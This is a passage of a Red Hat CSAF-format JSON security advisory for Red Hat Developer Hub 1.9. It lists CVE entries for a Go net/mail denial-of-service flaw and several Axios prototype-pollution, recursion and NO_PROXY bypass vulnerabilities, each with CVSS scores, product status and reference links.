"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME"
},
{
"cve": "CVE-2026-39820",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"discovery_date": "2026-05-07T20:01:27.800929+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467820"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net/mail` package of the Go programming language. An attacker could provide specially crafted inputs to the `ParseAddress`, `ParseAddressList`, or `ParseDate` functions. This could lead to excessive consumption of CPU and memory resources, resulting in a Denial of Service (DoS) for applications processing these inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/mail: golang: Go net/mail: Denial of Service via crafted email inputs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the Go `net/mail` package. Applications processing untrusted email inputs via `ParseAddress`, `ParseAddressList`, or `ParseDate` functions are susceptible to excessive resource consumption, which can lead to service unavailability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-39820"
},
{
"category": "external",
"summary": "RHBZ#2467820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-39820",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39820"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
},
{
"category": "external",
"summary": "https://go.dev/cl/759940",
"url": "https://go.dev/cl/759940"
},
{
"category": "external",
"summary": "https://go.dev/issue/78566",
"url": "https://go.dev/issue/78566"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4986",
"url": "https://pkg.go.dev/vuln/GO-2026-4986"
}
],
"release_date": "2026-05-07T19:41:19.854000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/mail: golang: Go net/mail: Denial of Service via crafted email inputs"
},
{
"cve": "CVE-2026-42033",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-04-24T18:01:20.937507+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461607"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42033"
},
{
"category": "external",
"summary": "RHBZ#2461607",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
"url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
}
],
"release_date": "2026-04-24T17:36:44.132000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
},
{
"cve": "CVE-2026-42035",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-04-24T18:01:17.109481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461606"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42035"
},
{
"category": "external",
"summary": "RHBZ#2461606",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
"url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
}
],
"release_date": "2026-04-24T17:38:07.752000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
},
{
"cve": "CVE-2026-42039",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-04-24T19:01:44.887156+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461630"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42039"
},
{
"category": "external",
"summary": "RHBZ#2461630",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
"url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
}
],
"release_date": "2026-04-24T18:01:30.775000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
},
{
"cve": "CVE-2026-42041",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-04-24T19:01:41.034289+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461629"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42041"
},
{
"category": "external",
"summary": "RHBZ#2461629",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
"url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
}
],
"release_date": "2026-04-24T17:55:30.036000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
},
{
"cve": "CVE-2026-42043",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2026-04-24T19:01:22.552379+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461626"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: NO_PROXY bypass via crafted URL",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42043"
},
{
"category": "external",
"summary": "RHBZ#2461626",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
"url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
}
],
"release_date": "2026-04-24T17:54:42.668000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios: NO_PROXY bypass via crafted URL"
},
{
"cve": "CVE-2026-42044",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-04-24T19:01:13.418725+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461624"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
